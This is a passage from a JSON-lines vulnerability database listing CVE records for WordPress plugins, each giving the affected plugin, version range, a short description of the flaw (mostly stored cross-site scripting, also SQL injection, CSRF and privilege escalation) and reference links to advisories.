trunk\\\/includes\\\/class-msntt-plus-friends.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191812\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191812\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mshop-naver-talktalk\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mshop-naver-talktalk\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/226baf3e-1b28-4196-9438-0b17fef4c5af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/226baf3e-1b28-4196-9438-0b17fef4c5af?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11427","slug":"catch-popup","versionImpact":"1.4.4","description":"The Catch Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catch-popup' shortcode in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/catch-popup\\\/trunk\\\/inc\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/catch-popup\\\/trunk\\\/inc\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/catch-popup\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/catch-popup\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ac7c825-aa5e-42fb-b1df-8be72945941c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ac7c825-aa5e-42fb-b1df-8be72945941c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12520","slug":"dominion-domain-checker-wpbakery-addon","versionImpact":"2.2.2","description":"The Dominion \u2013 Domain Checker for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dominion_shortcodes_domain_search_6' shortcode in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dominion-domain-checker-wpbakery-addon\\\/trunk\\\/modules\\\/domain_search\\\/domain_search_6\\\/doamin_search_shortcodes.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dominion-domain-checker-wpbakery-addon\\\/trunk\\\/modules\\\/domain_search\\\/domain_search_6\\\/doamin_search_shortcodes.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dominion-domain-checker-wpbakery-addon\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dominion-domain-checker-wpbakery-addon\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a684f597-da72-4697-9e37-ca45a30ca64d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a684f597-da72-4697-9e37-ca45a30ca64d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13595","slug":"simple-signup-form","versionImpact":"1.6.5","description":"The Simple Signup Form plugin for WordPress is vulnerable to SQL Injection via the 'id' attribute of the 'ssf' shortcode in all versions up to, and including, 1.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-signup-form\\\/trunk\\\/simple_signup_form.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-signup-form\\\/trunk\\\/simple_signup_form.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26c4008a-9043-4293-aaf3-8e72de667ad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26c4008a-9043-4293-aaf3-8e72de667ad8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10894","slug":"payment-forms-for-paystack","versionImpact":"4.0.2","description":"The Payment Forms for Paystack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'datepicker', 'textarea', and 'text' in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L218\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L218\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210130%40payment-forms-for-paystack&new=3210130%40payment-forms-for-paystack&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210130%40payment-forms-for-paystack&new=3210130%40payment-forms-for-paystack&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20b0a946-f429-4615-9d16-4a95a9120c3d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20b0a946-f429-4615-9d16-4a95a9120c3d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47582","slug":"wpbot-pro","versionImpact":"12.7.0","description":"Deserialization of Untrusted Data vulnerability in QuantumCloud WPBot Pro Wordpress Chatbot allows Object Injection. This issue affects WPBot Pro Wordpress Chatbot: from n\/a through 12.7.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpbot-pro\\\/vulnerability\\\/wordpress-wpbot-pro-wordpress-chatbot-12-7-0-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpbot-pro\\\/vulnerability\\\/wordpress-wpbot-pro-wordpress-chatbot-12-7-0-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6538","slug":"post-rating-and-review","versionImpact":"1.3.4","description":"The Post Rating and Review plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class\u2019 parameter in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-rating-and-review\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-rating-and-review\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a89b8f-554c-4d92-adb2-ec84138d568d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a89b8f-554c-4d92-adb2-ec84138d568d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0490","slug":"fx-toc","versionImpact":"1.1.0","description":"The f(x) TOC WordPress plugin through 1.1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b497d21-f075-41a9-afec-3e24034c8c63\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b497d21-f075-41a9-afec-3e24034c8c63\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2087","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.0.6. This is due to missing or incorrect nonce validation on the save function. This makes it possible for unauthenticated attackers to change plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d38d41c7-8786-4145-9591-3e24eff3b79c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d38d41c7-8786-4145-9591-3e24eff3b79c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3168","slug":"wp-reroute-email","versionImpact":"1.4.9","description":"The WP Reroute Email plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2933637\\\/wp-reroute-email\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2933637\\\/wp-reroute-email\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a0e962b-b6a0-4179-91d0-5ede508a9895?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a0e962b-b6a0-4179-91d0-5ede508a9895?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3547","slug":"all-in-one-b2b-for-woocommerce","versionImpact":"1.0.3","description":"The All in One B2B for WooCommerce WordPress plugin through 1.0.3 does not properly check nonce values in several actions, allowing an attacker to perform CSRF attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cfb6696-18ad-4a38-9ca3-992f0b768b78\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cfb6696-18ad-4a38-9ca3-992f0b768b78\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1566","slug":"redirects","versionImpact":"1.2.1","description":"The Redirects plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save function in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to change redirects created with this plugin. This could lead to undesired redirection to phishing sites or malicious web pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c6be7f2-5526-4fba-9fe0-003b8460c926?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c6be7f2-5526-4fba-9fe0-003b8460c926?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redirects\\\/trunk\\\/index.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redirects\\\/trunk\\\/index.php#L118\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4459","slug":"themesflat-addons-for-elementor","versionImpact":"2.1.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget's titles in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce7c2f30-188a-4ae7-976f-c7f0aaf96eee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce7c2f30-188a-4ae7-976f-c7f0aaf96eee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-simple-slide.php#L1117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-simple-slide.php#L1117\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6574","slug":"laposta","versionImpact":"1.12","description":"The Laposta plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.12. This is due to the plugin not preventing direct access to several test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. This plugin is no longer being maintained and has been closed for downloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7632fe73-4011-4e6e-8ce7-38a9359ac259?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7632fe73-4011-4e6e-8ce7-38a9359ac259?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/laposta\\\/trunk\\\/includes\\\/laposta-php-1.2\\\/examples\\\/member\\\/all.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/laposta\\\/trunk\\\/includes\\\/laposta-php-1.2\\\/examples\\\/member\\\/all.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7493","slug":"wpcom-member","versionImpact":"1.5.2.1","description":"The WPCOM Member plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.5.2.1. This is due to the plugin allowing arbitrary data to be passed to wp_insert_user() during registration. This makes it possible for unauthenticated attackers to update their role to that of an administrator during registration.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec7f3e0c-a07c-4082-9b6b-12d0fbe0fdc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec7f3e0c-a07c-4082-9b6b-12d0fbe0fdc8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.5.2\\\/includes\\\/form-validation.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.5.2\\\/includes\\\/form-validation.php#L267\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9274","slug":"elastik-page-builder","versionImpact":"0.27.4","description":"The Elastik Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.27.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/315687d4-9125-440b-9d53-81d71e56d4ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/315687d4-9125-440b-9d53-81d71e56d4ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elastik-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elastik-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11228","slug":"pgall-for-woocommerce","versionImpact":"5.1.4","description":"The ????? ?? ???? \u2013 ???? ?? ???? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's pafw_instant_payment shortcode in all versions up to, and including, 5.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pgall-for-woocommerce\\\/trunk\\\/templates\\\/checkout\\\/pafw\\\/instant-payment.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pgall-for-woocommerce\\\/trunk\\\/templates\\\/checkout\\\/pafw\\\/instant-payment.php#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191856\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191856\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pgall-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pgall-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fe166a9-8e80-4bb9-8074-5404289f5685?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fe166a9-8e80-4bb9-8074-5404289f5685?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12519","slug":"tcbd-auto-refresher","versionImpact":"2.0","description":"The TCBD Auto Refresher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbd_auto_refresh' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-auto-refresher\\\/trunk\\\/plugin-hook.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-auto-refresher\\\/trunk\\\/plugin-hook.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tcbd-auto-refresher\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tcbd-auto-refresher\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/851bade8-bd3a-4fb1-8a1d-12461287694e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/851bade8-bd3a-4fb1-8a1d-12461287694e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13588","slug":"simplebooklet","versionImpact":"1.1.0","description":"The Simplebooklet PDF Viewer and Embedder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'simplebooklet' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplebooklet\\\/trunk\\\/simplebooklet.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplebooklet\\\/trunk\\\/simplebooklet.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simplebooklet\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simplebooklet\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59d9ff2e-4b0b-4096-91ca-1a029f31796b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59d9ff2e-4b0b-4096-91ca-1a029f31796b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6383","slug":"wp-photonav","versionImpact":"1.2.2","description":"The WP-PhotoNav plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's photonav shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photonav\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photonav\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c07054e1-b6c9-4e70-aece-09f81bb418ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c07054e1-b6c9-4e70-aece-09f81bb418ef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2086","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the template_count function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to obtain plugin template information. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification being skipped. There is no capability check.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9efc782a-ec61-4741-81fd-a263a2739e16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9efc782a-ec61-4741-81fd-a263a2739e16?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3226","slug":"popup-builder","versionImpact":"4.1.15","description":"The Popup Builder WordPress plugin through 4.1.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/941a9aa7-f4b2-474a-84d9-9a74c99079e2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/941a9aa7-f4b2-474a-84d9-9a74c99079e2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1516","slug":"wp-e-commerce","versionImpact":"3.15.1","description":"The WP eCommerce plugin for WordPress is vulnerable to unauthorized arbitrary post creation due to a missing capability check on the check_for_saas_push() function in all versions up to, and including, 3.15.1. This makes it possible for unauthenticated attackers to create arbitrary posts with arbitrary content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a9f3d2-aa7f-4fc2-9cfd-b69ec3f63160?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a9f3d2-aa7f-4fc2-9cfd-b69ec3f63160?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-e-commerce\\\/trunk\\\/wpsc-components\\\/marketplace-core-v1\\\/library\\\/Sputnik.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-e-commerce\\\/trunk\\\/wpsc-components\\\/marketplace-core-v1\\\/library\\\/Sputnik.php#L191\",\"refsource\":\"\",\"tags\":[]}]"}
